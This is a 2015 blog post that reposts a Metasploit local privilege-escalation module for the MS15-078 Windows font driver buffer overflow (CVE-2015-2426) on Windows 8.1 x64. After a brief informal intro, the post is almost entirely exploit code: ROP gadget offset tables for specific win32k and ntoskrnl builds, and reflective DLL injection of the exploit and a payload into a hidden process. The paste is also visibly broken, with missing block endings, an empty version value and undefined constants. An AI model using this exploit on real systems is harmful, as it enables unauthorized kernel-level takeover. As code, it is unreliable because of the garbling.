Our Feeds

Friday 18 September 2015


Microsoft Windows Font Driver Buffer Overflow

Hi GuyZ,
     I think something went wrong in Microsoft security. Now adays the hackers are highly concentrates on Windows bug detection. New Buffer Overflow exploit also detected in Microsoft Windows.

Metasploit Exploit

# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
  Rank = ManualRanking
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection
  def initialize(info={})
    super(update_info(info, {
      'Name'            => 'MS15-078 Microsoft Windows Font Driver Buffer Overflow',
      'Description'     => %q{
        This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing
        a malformed font. The vulnerability was exploited by the hacking team and disclosed on
        the july data leak. This module has been tested successfully on vulnerable builds of
        Windows 8.1 x64.
      'License'         => MSF_LICENSE,
      'Author'          => [
          'Eugene Ching',    # vulnerability discovery and exploit
          'Mateusz Jurczyk', # vulnerability discovery
          'Cedric Halbronn', # vulnerability and exploit analysis
          'juan vazquez'     # msf module
      'Arch'            => ARCH_X86_64,
      'Platform'        => 'win',
      'SessionTypes'    => [ 'meterpreter' ],
      'DefaultOptions'  => {
          'EXITFUNC'    => 'thread',
      'Targets'         => [
          [ 'Windows 8.1 x64',  { } ]
      'Payload'         => {
          'Space'       => 4096,
          'DisableNops' => true
      'References'      => [
          ['CVE', '2015-2426'],
          ['CVE', '2015-2433'],
          ['MSB', 'MS15-078'],
          ['MSB', 'MS15-080'],
          ['URL', 'https://github.com/vlad902/hacking-team-windows-kernel-lpe'],
          ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/'],
          ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=369'],
          ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=480']
      'DisclosureDate'  => 'Jul 11 2015',
      'DefaultTarget'   => 0
  def patch_win32k_offsets(dll)
    @win32k_offsets.each do |k, v|
      case k
      when 'info_leak'
        dll.gsub!([0xdeedbeefdeedbe00].pack('Q<'), [v].pack('Q<'))
      when 'pop_rax_ret'
        dll.gsub!([0xdeedbeefdeedbe01].pack('Q<'), [v].pack('Q<'))
      when 'xchg_rax_rsp'
        dll.gsub!([0xdeedbeefdeedbe02].pack('Q<'), [v].pack('Q<'))
      when 'allocate_pool'
        dll.gsub!([0xdeedbeefdeedbe03].pack('Q<'), [v].pack('Q<'))
      when 'pop_rcx_ret'
        dll.gsub!([0xdeedbeefdeedbe04].pack('Q<'), [v].pack('Q<'))
      when 'deref_rax_into_rcx'
        dll.gsub!([0xdeedbeefdeedbe05].pack('Q<'), [v].pack('Q<'))
      when 'mov_rax_into_rcx'
        dll.gsub!([0xdeedbeefdeedbe06].pack('Q<'), [v].pack('Q<'))
      when 'pop_rbx_ret'
        dll.gsub!([0xdeedbeefdeedbe07].pack('Q<'), [v].pack('Q<'))
      when 'ret'
        dll.gsub!([0xdeedbeefdeedbe08].pack('Q<'), [v].pack('Q<'))
      when 'mov_rax_r11_ret'
        dll.gsub!([0xdeedbeefdeedbe09].pack('Q<'), [v].pack('Q<'))
      when 'add_rax_rcx_ret'
        dll.gsub!([0xdeedbeefdeedbe0a].pack('Q<'), [v].pack('Q<'))
      when 'pop_rsp_ret'
        dll.gsub!([0xdeedbeefdeedbe0b].pack('Q<'), [v].pack('Q<'))
      when 'xchg_rax_rsp_adjust'
        dll.gsub!([0xdeedbeefdeedbe0c].pack('Q<'), [v].pack('Q<'))
      when 'chwnd_delete'
        dll.gsub!([0xdeedbeefdeedbe0d].pack('Q<'), [v].pack('Q<'))
  def set_win32k_offsets
    @win32k_offsets ||= Proc.new do |version|
      case version
      when '6.3.9600.17393'
          'info_leak'           => 0x3cf00,
          'pop_rax_ret'         => 0x19fab,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x6121,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x352220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x98156,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xc432f,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xc4332,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x14db,   # pop rbx # ret # 5B C3
          'ret'                 => 0x6e314,  # ret C3
          'mov_rax_r11_ret'     => 0x7018e,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xee38f,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0xbc8f,   # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x189a3a, # xchg esp, eax # sbb al, 0 # mov eax, ebx # add rsp, 20h # pop rbx # ret # 94 1C 00 8B C3 48 83 c4 20 5b c3
          'chwnd_delete'        => 0x165010  # CHwndTargetProp::Delete
      when '6.3.9600.17630'
          'info_leak'           => 0x3d200,
          'pop_rax_ret'         => 0x19e9b,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x6024,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x351220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x84f4f,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xc3f7f,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xc3f82,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x14db,   # pop rbx # ret # 5B C3
          'ret'                 => 0x14dc,   # ret C3
          'mov_rax_r11_ret'     => 0x7034e,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xed33b,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0xbb93,   # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x17c78c, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
          'chwnd_delete'        => 0x146EE0  # CHwndTargetProp::Delete
      when '6.3.9600.17694'
          'info_leak'           => 0x3d300,
          'pop_rax_ret'         => 0x151f4,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x600c,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x351220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x2cf10,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xc3757,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xc375a,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x6682,   # pop rbx # ret # 5B C3
          'ret'                 => 0x6683,   # ret C3
          'mov_rax_r11_ret'     => 0x7010e,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xecd7b,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0x71380,  # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x178c84, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
          'chwnd_delete'        => 0x1513D8  # CHwndTargetProp::Delete
      when '6.3.9600.17796'
          'info_leak'           => 0x3d000,
          'pop_rax_ret'         => 0x19e4f,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x5f64,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x352220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x97a5e,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xc3aa7,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xc3aaa,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x1B20,   # pop rbx # ret # 5B C3
          'ret'                 => 0x1B21,   # ret C3
          'mov_rax_r11_ret'     => 0x7010e,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xecf8b,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0x29fd3,  # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x1789e4, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
          'chwnd_delete'        => 0x150F58  # CHwndTargetProp::Delete
      when '6.3.9600.17837'
          'info_leak'           => 0x3d800,
          'pop_rax_ret'         => 0x1a51f,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x62b4,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x351220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x97a4a,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xc3687,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xc368a,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x14db,   # pop rbx # ret # 5B C3
          'ret'                 => 0x14dc,   # ret C3
          'mov_rax_r11_ret'     => 0x94871,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xecbdb,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0xbd2c,   # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x15e84c, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
          'chwnd_delete'        => 0x15A470  # CHwndTargetProp::Delete
      when '6.3.9600.17915'
          'info_leak'           => 0x3d800,
          'pop_rax_ret'         => 0x1A4EF,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x62CC,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x351220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x9765A,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xC364F,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xC3652,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x14DB,   # pop rbx # ret # 5B C3
          'ret'                 => 0x14DC,   # ret # C3
          'mov_rax_r11_ret'     => 0x7060e,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xECDCB,  # add rax, rcx # 48 03 C1 C3
          'pop_rsp_ret'         => 0xbe33,   # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x15e5fc, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
          'chwnd_delete'        => 0x15A220  # CHwndTargetProp::Delete
  def patch_nt_offsets(dll)
    @nt_offsets.each do |k, v|
      case k
      when 'set_cr4'
        dll.gsub!([0xdeedbeefdeedbe0e].pack('Q<'), [v].pack('Q<'))
      when 'allocate_pool_with_tag'
        dll.gsub!([0xdeedbeefdeedbe0f].pack('Q<'), [v].pack('Q<'))
  def set_nt_offsets
    @nt_offsets ||= Proc.new do |version|
      case version
      when '6.3.9600.17415'
          'set_cr4'                => 0x38a3cc, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
          'allocate_pool_with_tag' => 0x2a3a50  # ExAllocatePoolWithTag
      when '6.3.9600.17630'
          'set_cr4'                => 0x38A3BC, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
          'allocate_pool_with_tag' => 0x2A3A50  # ExAllocatePoolWithTag
      when '6.3.9600.17668'
          'set_cr4'                => 0x38A3BC, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
          'allocate_pool_with_tag' => 0x2A3A50  # ExAllocatePoolWithTag
      when '6.3.9600.17936'
          'set_cr4'                => 0x3863bc, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
          'allocate_pool_with_tag' => 0x29FA50  # ExAllocatePoolWithTag
  def atmfd_version
    file_path = expand_path('%windir%') << '\\system32\\atmfd.dll'
    major, minor, build, revision, branch = file_version(file_path)
    return nil if major.nil?
    ver = "#{major}.#{minor}.#{build}.#{revision}"
    vprint_status("atmfd.dll file version: #{ver} branch: #{branch}")
  def win32k_version
    file_path = expand_path('%windir%') << '\\system32\\win32k.sys'
    major, minor, build, revision, branch = file_version(file_path)
    return nil if major.nil?
    ver = "#{major}.#{minor}.#{build}.#{revision}"
    vprint_status("win32k.sys file version: #{ver} branch: #{branch}")
  def ntoskrnl_version
    file_path = expand_path('%windir%') << '\\system32\\ntoskrnl.exe'
    major, minor, build, revision, branch = file_version(file_path)
    return nil if major.nil?
    ver = "#{major}.#{minor}.#{build}.#{revision}"
    vprint_status("ntoskrnl.exe file version: #{ver} branch: #{branch}")
  def check
    # We have tested only windows 8.1
    if sysinfo['OS'] !~ /Windows 8/i
      return Exploit::CheckCode::Unknown
    # We have tested only 64 bits
    if sysinfo['Architecture'] !~ /(wow|x)64/i
      return Exploit::CheckCode::Unknown
    atmfd = atmfd_version
    # atmfd => Works
    unless atmfd && Gem::Version.new(atmfd) <= Gem::Version.new('')
      return Exploit::CheckCode::Safe
    # win32k.sys 6.3.9600.17393 => Works
    @win32k = win32k_version
    unless @win32k && WIN32K_VERSIONS.include?(@win32k)
      return Exploit::CheckCode::Detected
    # ntoskrnl.exe 6.3.9600.17415 => Works
    @ntoskrnl = ntoskrnl_version
    unless @ntoskrnl && NT_VERSIONS.include?(@ntoskrnl)
      return Exploit::CheckCode::Unknown
  def exploit
    print_status('Checking target...')
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    check_result = check
    if check_result == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, 'Target not vulnerable')
    if check_result == Exploit::CheckCode::Unknown
      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
    if check_result == Exploit::CheckCode::Detected
      fail_with(Failure::NotVulnerable, 'ROP chain not available for the target nt/win32k')
    unless get_target_arch == ARCH_X86_64
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
    print_status("Exploiting with win32k #{@win32k} and nt #{@ntoskrnl}...")
    fail_with(Failure::NoTarget, 'win32k.sys offsets not available') if @win32k_offsets.nil?
    fail_with(Failure::NoTarget, 'ntoskrnl.exe offsets not available') if @nt_offsets.nil?
      print_status('Launching notepad to host the exploit...')
      notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      # Sandboxes could not allow to create a new process
      # stdapi_sys_process_execute: Operation failed: Access is denied.
      print_status('Operation failed. Trying to elevate the current process...')
      process = client.sys.process.open
    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-2426', 'reflective_dll.x64.dll')
    library_path = ::File.expand_path(library_path)
    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
    dll = ''
    ::File.open(library_path, 'rb') { |f| dll = f.read }
    exploit_mem, offset = inject_dll_data_into_process(process, dll)
    print_status("Exploit injected. Injecting payload into #{process.pid}...")
    payload_mem = inject_into_process(process, payload.encoded)
    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    print_status('Payload injected. Executing exploit...')
    process.thread.create(exploit_mem + offset, payload_mem)
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')